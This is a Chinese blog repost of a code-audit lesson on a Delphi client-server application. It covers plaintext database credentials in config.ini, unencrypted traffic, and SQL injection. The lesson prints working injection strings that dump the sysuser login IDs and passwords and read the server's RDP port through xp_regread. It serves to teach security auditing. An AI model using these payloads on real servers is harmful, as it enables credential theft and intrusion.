专注 APT 攻击与防御—Delphi代码审计

最新推荐文章于 2024-10-16 10:24:17 发布
最新推荐文章于 2024-10-16 10:24:17 发布
阅读量497 收藏 9
点赞数 8
文章标签: oracle 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62641226/article/details/137869664
版权

Delphi 代码审计 — 项目实战1

Delphi 代码审计 — 项目实战1

1、Function & Procedure

Delphi 把操作数据的方法分成了两种,一种是 function,另一种是 procedure,大致理解为“函数”和“过程”。
Procedure 类似 C 语言中的无返回值函数,即 VOID。而 Function 就是 C 语言中的有返回值函数,即没有 Void。

第三课:Delphi代码审计—项目实战1 - 图1

2、连接数据库

程序分为两种连接数据库模式:

第三课:Delphi代码审计—项目实战1 - 图2

无论是本地模式,还是联网模式,都是读取,当前路径的 config.ini 配置文件:

(导致敏感信息暴漏,可直连服务器)

第三课:Delphi代码审计—项目实战1 - 图3

继续跟数据库连接:配合SQL Server数据库,直接带入,可以判断出为明文存储。

第三课:Delphi代码审计—项目实战1 - 图4

3、config.ini

config.ini 配置如下:

第三课:Delphi代码审计—项目实战1 - 图5

4、C/S 交互过程

基于TCP通信,SQL Server通信构架大致如下:

(可导致通信过程中抓取明文执行)

第三课:Delphi代码审计—项目实战1 - 图6

5、SQL 注入

代入执行:(导致可拼接sql语句,查询任意语句或者执行命令)

第三课:Delphi代码审计—项目实战1 - 图7

第三课:Delphi代码审计—项目实战1 - 图8

部分语句其中如下:

 
 
  1. select distinct memberid,receivecompany
  2. from weigh where receivecompany is not null and receivecompany like ''%'+xxxxxx+'%''
 
 
6、Client
 
 
软件呈现如下:
 
 
 
 
 
  
第三课:Delphi代码审计—项目实战1 - 图9
 
 
 
 
7、构造 SQL 语句
 
 
对应收货单位编号,以及收货单位名称。分别为:memberidreceivecompany。闭合语句为:
 
 
 
 
  1. 2' ; select loginid as memberid , password as receivecompany from sysuser --
 
 
 
 
 
  
第三课:Delphi代码审计—项目实战1 - 图10
 
 
 
 
抓取返回如图:
 
 
  • 得到admin 账号以及密码。
 
 
 
 
 
  
第三课:Delphi代码审计—项目实战1 - 图11
 
 
 
 
  • 构造读取远程桌面端口号:得到远程服务器端口号
 
 
 
 
  1. 2' ; EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
  2. 'SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp',
  3. 'PortNumber' --
 
 
8、获取缓冲区内容
 
 
copy 获取缓冲区内容: (导致可从服务器端构造代码)
 
 
 
 
 
  
第三课:Delphi代码审计—项目实战1 - 图12
 
 
 
 
copy 用法如下:
 
 
 
  
copy(a,b,c);
 a:就是copy源,就是一个字符串,表示你将要从a里copy一些东西;
 b:从a中的第b位开始copy(包含第11位);
 c:copy从第b位开始后的c个字符,
 exp: m:=‘the test fuck’
 s:=copy(m,2,2); //s值为‘he’
 
 
 
 
当超出范围,会发生异常错误。实例中,从服务器数据库获取数据后进行 copy。
 
 
软件登陆部分代码如下:(导致可自动化跑 loginid。)
 
 
 
 
 
  
第三课:Delphi代码审计—项目实战1 - 图13
 
 
 
 
多次尝试错误处理如下:退出软件,并且重新开始计算。
 
 
第三课:Delphi代码审计—项目实战1 - 图14
 
 
 
 
 文章来源:亿林-黑龙江等保测评,哈尔滨等保托管,等保代办,网络安全,哈尔滨可靠的云安全服务商! (dbpc.cn)
前言 - 《专注 APT 攻击与防御 - Micro8 系列教程》 - 书栈网 · BookStack
 
 
 
  
 
 
 


                

        

        

    

  


    

      

        

            

              
                
                  黑龙江亿林等保
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
APT攻击与防范

				
			

			

				

					悦分享
				

				

					07-04
					
					3151
					
				

			

		

		

			
				
当今,网络系统面临着越来越严重的安全挑战,在众多的安全挑战中,一种具有组织性、特定目标以及长时间持续性的新型网络攻击日益猖獗,国际上常称之为 APT(Advanced Persistent Threat高级持续性威胁)攻击。美国国家标准技术研究所(NIST)对APT的定义为:攻击装掌握先进的专业知识和有效的资源,通过多种攻击途径(如:网络、物理设施和欺骗等),在特定组织的信息技术基础设施建立并转移立足点,以窃取机密信息,破坏或阻碍任务、程序或组织的关键系统,或者驻留在组织内部网络,进行后续攻击APT攻击

			
		

	



                

              
                



	

		

			

				
					
DELPHI实现的一些国内黑客程序技巧

				
			

			

				

					~缘份天空~
				

				

					05-22
					
					1875
					
				

			

		

		

			
				
实际上目前所有的OICQ探测方法都一样,发送一个OICQ消息给对方,凭借OICQ 的返回信息来判断对方的OICQ号码,具体的DELPHI实现如下: NMUDP1是ICS控件包的UDP控件。 NMUDP1.ReportLevel := Status_Basic; NMUDP1.RemoteHost := edit1.Text; NMUDP1.RemotePort := 4000; UdpTmpStr

			
		

	



                


  
              

                


	

		

			

				
					
病毒专门攻击Delphi及其生成的程序 W32/Induc-A(Virus.Win32.Induc.a)

				
			

			

				

					ralyee的专栏
				

				

					10-04
					
					1152
					
				

			

		

		

			
				
2009年08月20日 星期四 上午 11:44大家检查下安装目录 lib下的SysConst.dcu文件,大小如果为17KB,就是被感染了。SysConst.dcu正确大小应该为12KB 左右。lib/debug目录下有SysConst.dcu,替换回来就可以恢复正常!该病毒名为Win32.Induc,专门感染由Delphi建立的应用程序,Delphi是Windows

			
		

	





	

		

			

				
					
病毒攻击Delphi

				
			

			

				

					hety
				

				

					08-19
					
					109
					
				

			

		

		

			
				
你用delphi吗?请检查一下你的C:\Program Files\Borland\Delphi7\Lib\sysconst.dcu, 如果是17k,请立刻删除,用原始.pas重新编译,避免扩散。

我朋友的产品刚发布即收到卡巴斯基来信提示,发现可能是由于使用某一控件而感染,被迫将所有产品重新编译发布。

[quote]
cnbeta
该病毒名为Win32.Induc,专门感染由Del...

			
		

	



		

			
		



	

		

			

				
					
如何防止SQL注入攻击

				
			

			

				

					DesignLife的专栏
				

				

					10-17
					
					959
					
				

			

		

		

			
				
BS系统中,传统的注入攻击手段有很多。 最基本的,利用单引号攻击的,很容易解决,用类似于QuotedStr()(实际开发是其他语言,这里用DELPHI中的函数代替)的函数处理参数即可。 但实际应用中,不可避免会有一些应用需要直接传递参数,例如表名、查询条件、排序条件等等 对这些应用的注入攻击防不胜防。 我考虑了一个思路,供大家参考。 1 对所有网页传入的参数分三种。   a) 数字类型,用StrT

			
		

	





	

		

			

				
					
APT攻击检测与防御详解

					
热门推荐

				
			

			

				

					Antrn
				

				

					01-20
					
					4万+
					
				

			

		

		

			
				
APT定义
APT(Advanced Persistent Threat)是指高级持续性威胁,本质是针对性攻击。 利用先进的攻击手段对特定目标进行长期持续性网络攻击攻击形式,APT攻击的原理相对于其他攻击形式更为高级和先进,其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。在此收集的过程中,此攻击会主动挖掘被攻击对象受信系统和应用程序的漏洞,利用这些漏洞组建.........

			
		

	





	

		

			

				
					
网络安全威胁——APT攻击

				
			

			

				

					聚集机器学习、信息安全
				

				

					10-06
					
					4290
					
				

			

		

		

			
				
高级持续性威胁(APT,Advanced Persistent Threat),又叫高级长期威胁,是一种复杂的、持续的网络攻击,本文详细介绍了APT攻击的概念、方法和典型案例。

			
		

	





	

		

			

				
					
【转】APT攻击检测与防御详解

				
			

			

				

					SunnyCat
				

				

					04-28
					
					4258
					
				

			

		

		

			
				
原文连接:https://blog.csdn.net/qq_38232598/article/details/86564172
APT定义
APT(Advanced Persistent Threat)是指高级持续性威胁,本质是针对性攻击。 利用先进的攻击手段对特定目标进行长期持续性网络攻击攻击形式,APT攻击的原理相对于其他攻击形式更为高级和先进,其高级性主要体现在APT在发动攻击之前需要对攻...

			
		

	





	

		

			

				
					
浅谈APT攻击

				
			

			

				

					顺其自然~专栏
				

				

					12-06
					
					1万+
					
				

			

		

		

			
				
APT(Advanced Persistent Threat):高级持续威胁,主要特点是利用手段高,攻击持续,高危害。换句话说其实当于持续性高级渗透,加上恶意的目的或者谋取利益的想法时,就成了威胁,而APT防御一般出现于酒足饭饱之后。

0×00.APT的历史起源

APT这个词汇最早起源于:2005,2005年英国和美国的CERT组织发布了关于有针对性的社交工程电子邮件,放弃特洛伊木马以泄露敏感...

			
		

	





	

		

			

				
					
专注 APT 攻击防御 - Micro8 读书笔记1

				
			

			

				

					08-04
				

			

		

		

			
				
专注 APT 攻击防御 - Micro8 读书笔记1】  APT(Advanced Persistent Threat,高级持续性威胁)攻击是一种由高度组织和有针对性的威胁参与者发起的网络攻击,旨在长期潜伏在目标网络中,窃取敏感信息或进行其他...

			
		

	





	

		

			

				
					
军事网络APT攻击防御体系设计

				
			

			

				

					01-12
				

			

		

		

			
				
在分析APT攻击特点、步骤和方法的基础上,构建了军事网络应对APT攻击的多级防御模型,针对入侵、潜伏和破坏等3个防御APT攻击的关键环节,设计了有效的防御系统,提出了具体的防御方法。测试结果表明,设计的防御体系...

			
		

	





	

		

			

				
					
[网络安全自学篇] 七十四.APT攻击检测溯源与常见APT组织的攻击案例

				
			

			

				

					杨秀璋的专栏
				

				

					05-11
					
					1万+
					
				

			

		

		

			
				
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WannaCry蠕虫的传播机制,带领大家详细阅读源代码。这篇文章将分享APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。希望文章对您有所帮助~...

			
		

	





	

		

			

				
					
DELPHI下打造自己的简单木马

				
			

			

				

					蓝色的雨
				

				

					10-15
					
					2468
					
				

			

		

		

			
				
今天晚上无聊写着玩的,如果你是高手就别看了,免得我丢人。本文章只适合初学DELPHI小菜。刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32

			
		

	





	

		

			

				
					
dbt doc 生成文档命令示例应用

				
			

			

				

					neweastsun的专栏
				

				

					10-12
					
					625
					
				

			

		

		

			
				
DBT提供了强大的命令行工具,它使数据分析师和工程师能够更有效地转换仓库中的数据。dbt的一个关键特性是能够为数据模型生成文档,这就是dbt docs命令发挥作用的地方。本教程将指导您完成使用dbt生成和提供项目文档的过程。

			
		

	





	

		

			

				
					
Mysql(2)—SQL语法详解(通俗易懂)

				
			

			

				

					qq_17153885的博客
				

				

					10-13
					
					1104
					
				

			

		

		

			
				
SQL(Structured Query Language,结构化查询语言)是一种用于管理关系型数据库的标准编程语言。它主要用于数据的查询、插入、更新和删除等操作。SQL最初在1970年代由IBM的研究人员开发,旨在处理关系数据模型。

			
		

	





	

		

			

				
					
DBdoctor推出无Agent轻量级纳管解决方案

					
最新发布

				
			

			

				

					DBdoctor_off的博客
				

				

					10-16
					
					375
					
				

			

		

		

			
				
通过无Agent纳管实例,可方便小伙伴快速体验SQL审核、性能洞察等功能,但同时因采集限制,锁透视、审计日志、根因分析等部分功能将受限,因此想体验DBdoctor全量功能,还是建议小伙伴们通过Agent方式进行实例纳管。DBdoctor是一款企业级数据库监控、巡检、性能诊断、SQL审核与优化平台,利用eBPF透视数据库内核,可一分钟定位数据库性能问题,实现根因诊断,并给出优化建议。

			
		

	





	

		

			

				
					
Oracle数据库进阶】001.SQL基础查询_查询语句

				
			

			

				

					weixin_50296259的博客
				

				

					10-10
					
					989
					
				

			

		

		

			
				
SQL(Structured Query Language,结构化查询语言)是用于管理和操作关系数据库的标准语言SQL语言主要用于以下几种操作数据定义语言(DDL)用于创建、修改和删除数据库对象,如数据库、表、索引等常用的DDL语句包括CREATE、ALTER和DROP数据操作语言(DML)用于查询、插入、更新和删除数据库中的数据常用的DML语句包括SELECT、INSERT、UPDATE和DELETE数据控制语言(DCL)用于控制对数据库对象的访问权限。

			
		

	





	

		

			

				
					
HTTP隧道Tunna 1.1:APT攻击防御示例

				
			

			

				

					
				

			

		

		

			
				
Tunna是一款基于HTTP协议的隧道工具,特别适用于APT(高级持续性威胁)攻击防御场景中的网络穿透和数据传输。版本1.1新增了对SOCKS4a的支持,使得它在隐蔽性和灵活性上有所提升。  文档中提到了两个网络环境,一个...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值